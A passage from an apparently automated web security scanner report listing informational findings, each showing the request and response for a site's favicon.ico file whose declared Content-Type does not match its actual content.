Date: Sat, 02 Apr 2011 13:45:41 GMT
Server: Perlbal
Last-Modified: Thu, 27 Jul 2006 21:27:40 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 3638
Connection: close

..............h...&... ..............(....... ...........@............................tO.w.................................................n..........................................iL...............
...[SNIP]...
27.113. http://www.justia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.justia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.justia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Jan 2010 03:25:19 GMT
ETag: "3932a173-37e-47d0351e245c0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................................................................q;.zG-.xe........................................xe.....s......r...................r....
...[SNIP]...
27.114. http://www.justluxe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.justluxe.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.justluxe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 07 May 2009 06:14:13 GMT
ETag: "13f8311-47e-4694c6bbfb740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................................................0QS.0QS    ........................................0QS.0QS.0QSH0QS.0QS.0QSK0QS'0QS.0QS'......................
...[SNIP]...
27.115. http://www.k12.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.k12.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.k12.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 21 Sep 2007 19:11:38 GMT
ETag: "47e-43aaa0a452e80"
Accept-Ranges: bytes
Content-Length: 1150
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
pics-label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 c 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0) "http://www.icra.org/ratingsv02.html" l r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l r(n 0 s 0 v 0 l 0))
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
27.116. http://www.kazaa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kazaa.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kazaa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 05:16:53 GMT
ETag: "e00cdf-47e-49ea6c4f51b40"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................:.........................}q2.vi............................z............
...........    ........shf.yj...................
...[SNIP]...
27.117. http://www.kcom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kcom.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749040; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fcontact-us%2Fbrighton%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.5.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 16 Nov 2009 15:24:32 GMT
ETag: "2a6a5-47e-9b350c00"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...........................}.................!s..!p......0...4...H.M.H.M.H.M.:...4...4.....O...k.....................1...?.y.4...C.f.H.M.H.M.G.S.7...4.....B...6...
...[SNIP]...
27.118. http://www.kcom.com/favicon1.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kcom.com
Path:   /favicon1.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon1.ico HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; exp_last_activity=1301749016; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.1.10.1301752662

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 26 Nov 2009 10:39:58 GMT
ETag: "5aa56-47e-cbee3b80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...........................}.................!s..!p......0...4...H.M.H.M.H.M.:...4...4.....O...k.....................1...?.y.4...C.f.H.M.H.M.G.S.7...4.....B...6...
...[SNIP]...
27.119. http://www.kickapps.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kickapps.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kickapps.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:41:42 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 5
Connection: close
Content-Type: text/html; charset=UTF-8

ERROR
27.120. http://www.lijit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lijit.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lijit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:05 GMT
Server: PWS/1.7.1.5
X-Px: ht iad-agg-n6.panthercdn.com
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 09:34:49 GMT
Age: 15016
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 17 Mar 2011 12:33:04 GMT
Connection: keep-alive

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
27.121. http://www.livevideo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.livevideo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livevideo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=q58e2q8qs5alfuj8eu827ing04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 503 Service Temporarily Unavailable
Retry-After: 7200
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25139


<font face=arial size=2>
<table border=0 cellspacing=0 cellpadding=0 width=750 align=center><tr><td>
<center><br><img src="/live-video.gif"><br><br>

<table border=0 cellspacing=0 cellpadding=20 widt
...[SNIP]...
27.122. http://www.localpages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.localpages.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.localpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:21 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 00:16:39 GMT
ETag: "2a867c-37e-47f48108ea7c0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................................T...............................................V.........................................D....r.....................
...[SNIP]...
27.123. http://www.localschooldirectory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.localschooldirectory.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.localschooldirectory.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:23 GMT
Server: Apache/2.2.4 (Fedora)
Vary: Host
Last-Modified: Sat, 06 Nov 2010 18:54:40 GMT
ETag: "5b0543-29b-ec5dfc00"
Accept-Ranges: bytes
Content-Length: 667
Cache-Control: max-age=2592000, public
Connection: close
Content-Type: text/plain; charset=UTF-8

.PNG
.
...IHDR...............h6....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...-IDATx.b|........E.8...........#..~..ZW..Z.........\....X5....0...|.P....o.?....SR.....o.a...@..........:.e...{
...[SNIP]...
27.124. http://www.lowfares.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lowfares.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lowfares.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:40 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 14 May 2007 19:40:49 GMT
ETag: "556-430734b449240"
Accept-Ranges: bytes
Content-Length: 1366
P3P: policyref="/static/policy.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding

..............@.......(........................................p..............o...E.......@...........k.......'...........0.......f...........6..............[.......P.......Q...................p.....
...[SNIP]...
27.125. http://www.lunka.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lunka.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lunka.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:52:02 GMT
Content-Type: text/plain; charset=Windows-1251
Connection: keep-alive
Last-Modified: Thu, 18 Nov 2010 08:28:30 GMT
ETag: "375df19-57e-4954f931dc780"
Accept-Ranges: bytes
Content-Length: 1406

..............h.......(....... .......................................aa..44......OO..........TT..........##..kk..""..\\..........QQ......................,,..............mm......11......SS............
...[SNIP]...
27.126. http://www.mac.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mac.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 1064
Content-Type: text/plain
Server: Apache/1.3.33 (Darwin)
Last-Modified: Tue, 14 Jan 2003 23:08:49 GMT
ETag: "5c2a3fb-428-3e249881"
Date: Sat, 02 Apr 2011 13:40:47 GMT
Connection: close

.PNG
.
...IHDR.............h.......gAMA.....OX2....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?........X..?@.1.D....o...........i.x.H23.<q.. .X@..8....X.._=...@p=0..@.,<.OjV..........l.....q....
...[SNIP]...
27.127. http://www.maniatv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.maniatv.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maniatv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:54 GMT
Server: Apache/2.2.8 (Fedora)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.
27.128. http://www.mediaite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mediaite.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mediaite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 26 Mar 2010 19:48:19 GMT
ETag: "1b82e3-47e-482b971f0a6c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................................................................................................................................................NQ......46
...[SNIP]...
27.129. http://www.medicalnewstoday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.medicalnewstoday.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medicalnewstoday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:22 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sat, 24 Feb 2007 01:52:49 GMT
ETag: "43000e-e36-2a56be40"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............h...&... ..............(....... ...........@................................_O.........LWL..........;1.....1|v...~..*......p....g^..C0.....2............RH..vk.....VC7.Oma.....l...}0....
...[SNIP]...
27.130. http://www.mercurynews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mercurynews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mercurynews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 02 Apr 2011 13:37:38 GMT
Content-Length: 15
Connection: close

File not found.
27.131. http://www.michigan.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.michigan.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.michigan.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:47 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 11 Dec 2004 22:27:07 GMT
ETag: "1426-57e-924944c0"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: public, max-age=86400
Content-Type: text/plain

..............h.......(....... ................................................x...Z...<..........................o.o.W.W.@.@..................w...Z...=... ..........s...d...U...F.o.7.W.(.@...........
...[SNIP]...
27.132. http://www.military.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.military.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.military.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:48 GMT
Server: Apache
Cache-Control: max-age=6000
Expires: Sat, 02 Apr 2011 15:03:48 GMT
Last-Modified: Mon, 29 Mar 2010 19:03:32 GMT
ETag: "1801bda-57e-4bb0f984"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ................................XE..WH..WH..l_..WH..yl..............nb..nb..........o`..........eS...w...z..........XG......XG..XG...x.......x......YE......XH......YE...
...[SNIP]...
27.133. http://www.miniclip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.miniclip.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.miniclip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 07 Jul 2006 15:11:37 GMT
ETag: "117c-3aee-417ff47e2fc40"
Content-Type: text/plain; charset=UTF-8
X-Cacheable: YES
Content-Length: 15086
Date: Sat, 02 Apr 2011 13:25:38 GMT
X-Varnish: 449801634 449792927
Age: 451
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: webftl06
X-Cache: HIT
X-Cache-Hits: 31

............ .h...6... .... .........00.... ..%..F...(....... ..... .....@.............................................................................................................................
...[SNIP]...
27.134. http://www.mlive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mlive.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mlive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 01 May 2003 16:59:46 GMT
ETag: "1b9337-57e-3bc9d39382480"
Accept-Ranges: bytes
Content-Length: 1406
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:00:26 GMT
Date: Sat, 02 Apr 2011 14:00:25 GMT
Connection: close

..............h.......(....... ...........@............................3...........x..#.......i....O<..lb.>...........M..."....fu.J|....................................................................
...[SNIP]...
27.135. http://www.mochila.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mochila.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mochila.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:45:10 GMT
Accept-Ranges: bytes
ETag: "541e6-1536-47c73e224fa00"
Connection: Keep-Alive
Last-Modified: Wed, 06 Jan 2010 00:17:44 GMT
Content-Length: 5430

............ .h...&... .... .........(....... ..... ......................................................................................................i...n..................(((.;;;...............
...[SNIP]...
27.136. http://www.music-oasis.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.music-oasis.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.music-oasis.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:38 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
27.137. http://www.musiciansfriend.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.musiciansfriend.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musiciansfriend.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 15 Jan 2010 23:11:32 GMT
Accept-Ranges: bytes
Content-Length: 1406
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=269732
Expires: Tue, 05 Apr 2011 16:35:34 GMT
Date: Sat, 02 Apr 2011 13:40:02 GMT
Connection: close
Set-Cookie: AKA-SESSION=35ce8f185c5000003227974d69c20a00849f0000; path=/; domain=musiciansfriend.com
Set-Cookie: OMTR-AKAID=35ce8f185c5000003227974d69c20a00859f0000; expires=Sun, 06-Mar-2016 13:40:02 GMT; path=/; domain=musiciansfriend.com
Set-Cookie: AKA-SESSION-5D=35ce8f185c5000003227974d69c20a00869f0000; expires=Thu, 07-Apr-2011 13:40:02 GMT; path=/; domain=musiciansfriend.com

..............h.......(....... ...................................T...W.....W."?x.....;...p...[}..;.......0i..^...cf..S...-W...7o.AV....V.y...6As.8q...9r.,^..........X...?Fv.,O..Z...\...3q..m...Y.....
...[SNIP]...
27.138. http://www.myheritage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.myheritage.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myheritage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.2.9 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Sun, 06 Nov 2005 17:24:54 GMT
ETag: "8c857f-57e-d11b6580"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:03 GMT
Connection: close

..............h.......(....... ...........@.......................................................r...D...Q... .~...~...z.E...P...P...;...C...9.....}...}.&.N.'.H.!.}...~.).z.[...(...W...*...P.....~.#.
...[SNIP]...
27.139. http://www.mylifetime.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 08 Jul 2009 07:10:20 GMT
ETag: "104d04c49-1536-46e2c6e994f00"
RealServer: prodweb8
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=80968
Expires: Sun, 03 Apr 2011 12:04:47 GMT
Date: Sat, 02 Apr 2011 13:35:19 GMT
Content-Length: 5430
Connection: close

............ .h...&... .... .........(....... ..... .........................U%..T&..S%..S&..T'..S%..U$..V(..U'..U%..S&..T&..T&..S%..T&..S&..S'..T(..S%..............^6..S'..^2..^3..V(..U&..U&..V&..U%
...[SNIP]...
27.140. http://www.mylocalemployment.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mylocalemployment.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylocalemployment.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/plain; charset=UTF-8
P3P: CP="IDC CON TEL CUR DEV SAM IND"
Date: Sat, 02 Apr 2011 13:56:30 GMT
Accept-Ranges: bytes
ETag: "2ef4d3-47e-48c12aa1a6880"
Connection: Keep-Alive
Last-Modified: Fri, 23 Jul 2010 19:01:38 GMT
Content-Length: 1150

............ .h.......(....... ..... ...............................x...r...k...h...h...f...e...e...e...e...e...e...e...e.Gl.......x...o..g..d..d..a..^..^..^.._.._.._.._..`.F{j.....%...H.
...[SNIP]...
27.141. http://www.mystart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mystart.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
